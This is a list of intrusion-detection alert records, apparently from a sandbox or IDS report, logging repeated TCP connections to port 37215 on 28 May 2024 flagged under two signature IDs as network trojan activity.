            SID:2829579
            Source Port:55396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811528
            SID:2829579
            Source Port:51550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849719
            SID:2829579
            Source Port:41288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879532
            SID:2835222
            Source Port:48718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779193
            SID:2829579
            Source Port:59464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298716
            SID:2829579
            Source Port:59748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911278
            SID:2829579
            Source Port:60772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931991
            SID:2829579
            Source Port:59144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836935
            SID:2835222
            Source Port:35596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850400
            SID:2829579
            Source Port:45110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.976831
            SID:2835222
            Source Port:53740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374148
            SID:2835222
            Source Port:42632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863102
            SID:2835222
            Source Port:44102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765165
            SID:2835222
            Source Port:49542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276953
            SID:2835222
            Source Port:42958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334322
            SID:2829579
            Source Port:47100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056826
            SID:2835222
            Source Port:47862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.409451
            SID:2835222
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910046
            SID:2835222
            Source Port:39750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321309
            SID:2829579
            Source Port:44718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777018
            SID:2829579
            Source Port:48040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260954
            SID:2835222
            Source Port:60130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735578
            SID:2835222
            Source Port:33512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998179
            SID:2835222
            Source Port:46820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952562
            SID:2829579
            Source Port:37904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979360
            SID:2835222
            Source Port:43754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.630997
            SID:2829579
            Source Port:37950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380427
            SID:2829579
            Source Port:41186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675789
            SID:2829579
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691721
            SID:2829579
            Source Port:46514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.070670
            SID:2835222
            Source Port:35802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823336
            SID:2829579
            Source Port:46368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735733
            SID:2829579
            Source Port:39134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.054080
            SID:2835222
            Source Port:49934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994849
            SID:2829579
            Source Port:47890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314087
            SID:2829579
            Source Port:55238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031455
            SID:2829579
            Source Port:38746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946229
            SID:2829579
            Source Port:34156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757426
            SID:2835222
            Source Port:52068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894327
            SID:2829579
            Source Port:51950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.652537
            SID:2835222
            Source Port:54196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500228
            SID:2835222
            Source Port:49960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.925010
            SID:2835222
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.011183
            SID:2829579
            Source Port:45740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.939753
            SID:2829579
            Source Port:34348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.102777
            SID:2835222
            Source Port:57594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871382
            SID:2829579
            Source Port:40502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820738
            SID:2829579
            Source Port:44970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884620
            SID:2835222
            Source Port:48004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866893
            SID:2829579
            Source Port:43334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601724
            SID:2829579
            Source Port:35898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.051593
            SID:2835222
            Source Port:40234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290360
            SID:2829579
            Source Port:55472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669595
            SID:2829579
            Source Port:55478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862998
            SID:2835222
            Source Port:39532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863162
            SID:2829579
            Source Port:33174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375494
            SID:2835222
            Source Port:59874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323135
            SID:2829579
            Source Port:46618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755829
            SID:2835222
            Source Port:34424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814837
            SID:2835222
            Source Port:41438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027142
            SID:2829579
            Source Port:35046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.051520
            SID:2835222
            Source Port:42636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858644
            SID:2835222
            Source Port:38524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.857936
            SID:2835222
            Source Port:57548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575000
            SID:2835222
            Source Port:52876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754559
            SID:2829579
            Source Port:46706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808248
            SID:2829579
            Source Port:45050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434222
            SID:2829579
            Source Port:40886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066783
            SID:2829579
            Source Port:48120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326285
            SID:2829579
            Source Port:36248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442547
            SID:2829579
            Source Port:48388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854776
            SID:2835222
            Source Port:36092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840255
            SID:2835222
            Source Port:42138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010573
            SID:2829579
            Source Port:40644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737259
            SID:2835222
            Source Port:37818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771339
            SID:2835222
            Source Port:49448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925502
            SID:2829579
            Source Port:51236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.658801
            SID:2835222
            Source Port:53502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997867
            SID:2829579
            Source Port:46062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743654
            SID:2835222
            Source Port:45160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771265
            SID:2835222
            Source Port:35878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676182
            SID:2829579
            Source Port:58296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.782107
            SID:2835222
            Source Port:39634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741511
            SID:2829579
            Source Port:40458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.128782
            SID:2835222
            Source Port:56490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.476264
            SID:2835222
            Source Port:49294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909911
            SID:2835222
            Source Port:33260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.442042
            SID:2829579
            Source Port:58706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806174
            SID:2829579
            Source Port:35580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453104
            SID:2829579
            Source Port:53310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738694
            SID:2829579
            Source Port:50852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920137
            SID:2829579
            Source Port:53798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880912
            SID:2835222
            Source Port:39952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327230
            SID:2835222
            Source Port:51004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778386
            SID:2835222
            Source Port:36700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.070686
            SID:2835222
            Source Port:57004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863873
            SID:2829579
            Source Port:59334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717563
            SID:2829579
            Source Port:54040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655239
            SID:2835222
            Source Port:54814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789022
            SID:2835222
            Source Port:54854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716734
            SID:2829579
            Source Port:52004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746815
            SID:2835222
            Source Port:36264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767562
            SID:2835222
            Source Port:40720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713875
            SID:2835222
            Source Port:33866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.295758
            SID:2829579
            Source Port:52442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898916
            SID:2835222
            Source Port:37434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326206
            SID:2835222
            Source Port:48342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788976
            SID:2835222
            Source Port:42630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387403
            SID:2835222
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953018
            SID:2835222
            Source Port:59168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000017
            SID:2835222
            Source Port:43990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309359
            SID:2829579
            Source Port:40854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.945415
            SID:2829579
            Source Port:59412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999023
            SID:2835222
            Source Port:50068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782753
            SID:2835222
            Source Port:32908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.193589
            SID:2829579
            Source Port:56184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568241
            SID:2829579
            Source Port:50250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.671844
            SID:2829579
            Source Port:38722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728748
            SID:2829579
            Source Port:37816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377072
            SID:2829579
            Source Port:59336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837103
            SID:2829579
            Source Port:36282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860643
            SID:2835222
            Source Port:49122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839570
            SID:2829579
            Source Port:59400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935479
            SID:2835222
            Source Port:57856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061508
            SID:2829579
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617082
            SID:2835222
            Source Port:54116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.886639
            SID:2835222
            Source Port:38784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559244
            SID:2829579
            Source Port:36136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.676686
            SID:2835222
            Source Port:35612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574191
            SID:2829579
            Source Port:34962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923127
            SID:2829579
            Source Port:42482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767273
            SID:2829579
            Source Port:35764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327542
            SID:2829579
            Source Port:42016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.854896
            SID:2835222
            Source Port:33118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847699
            SID:2829579
            Source Port:53652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.925029
            SID:2829579
            Source Port:38520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.773536
            SID:2835222
            Source Port:34208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778706
            SID:2829579
            Source Port:56106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380229
            SID:2829579
            Source Port:34424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026484
            SID:2829579
            Source Port:50572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957616
            SID:2829579
            Source Port:47900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862952
            SID:2835222
            Source Port:38784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523657
            SID:2835222
            Source Port:37796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739575
            SID:2835222
            Source Port:37240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879725
            SID:2835222
            Source Port:53072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053812
            SID:2835222
            Source Port:39546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611170
            SID:2829579
            Source Port:58586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930662
            SID:2835222
            Source Port:41322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824543
            SID:2829579
            Source Port:39246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930774
            SID:2835222
            Source Port:39464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934294
            SID:2829579
            Source Port:37398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849606
            SID:2835222
            Source Port:54782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414223
            SID:2835222
            Source Port:36210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378197
            SID:2835222
            Source Port:48504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878723
            SID:2829579
            Source Port:46588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398558
            SID:2829579
            Source Port:37706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046138
            SID:2835222
            Source Port:50924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852135
            SID:2829579
            Source Port:47842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.342516
            SID:2829579
            Source Port:50064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840164
            SID:2829579
            Source Port:54166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294681
            SID:2829579
            Source Port:52356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809516
            SID:2835222
            Source Port:59264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870683
            SID:2835222
            Source Port:54456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321641
            SID:2835222
            Source Port:38760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760012
            SID:2835222
            Source Port:41292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938899
            SID:2829579
            Source Port:36218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.445949
            SID:2835222
            Source Port:42476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911926
            SID:2829579
            Source Port:57498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152893
            SID:2829579
            Source Port:54978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.805959
            SID:2835222
            Source Port:41050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956766
            SID:2835222
            Source Port:39322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864975
            SID:2835222
            Source Port:47914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469871
            SID:2835222
            Source Port:48000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381884
            SID:2829579
            Source Port:58438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.017417
            SID:2829579
            Source Port:56474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775563
            SID:2835222
            Source Port:35938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376840
            SID:2835222
            Source Port:58562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818264
            SID:2835222
            Source Port:47070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552653
            SID:2829579
            Source Port:60042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962847
            SID:2835222
            Source Port:37614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917199
            SID:2835222
            Source Port:40666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904397
            SID:2829579
            Source Port:48292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916901
            SID:2835222
            Source Port:35392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435800
            SID:2829579
            Source Port:57658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617432
            SID:2829579
            Source Port:38804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936273
            SID:2829579
            Source Port:43252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756063
            SID:2835222
            Source Port:55484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790501
            SID:2835222
            Source Port:54850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833388
            SID:2835222
            Source Port:46294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862656
            SID:2835222
            Source Port:33138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827628
            SID:2829579
            Source Port:38306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597453
            SID:2829579
            Source Port:56068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930097
            SID:2829579
            Source Port:32916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542619
            SID:2835222
            Source Port:37590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.751303
            SID:2829579
            Source Port:35488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994709
            SID:2829579
            Source Port:48750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293382
            SID:2829579
            Source Port:50094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048641
            SID:2829579
            Source Port:50064
            Destination Port:37215
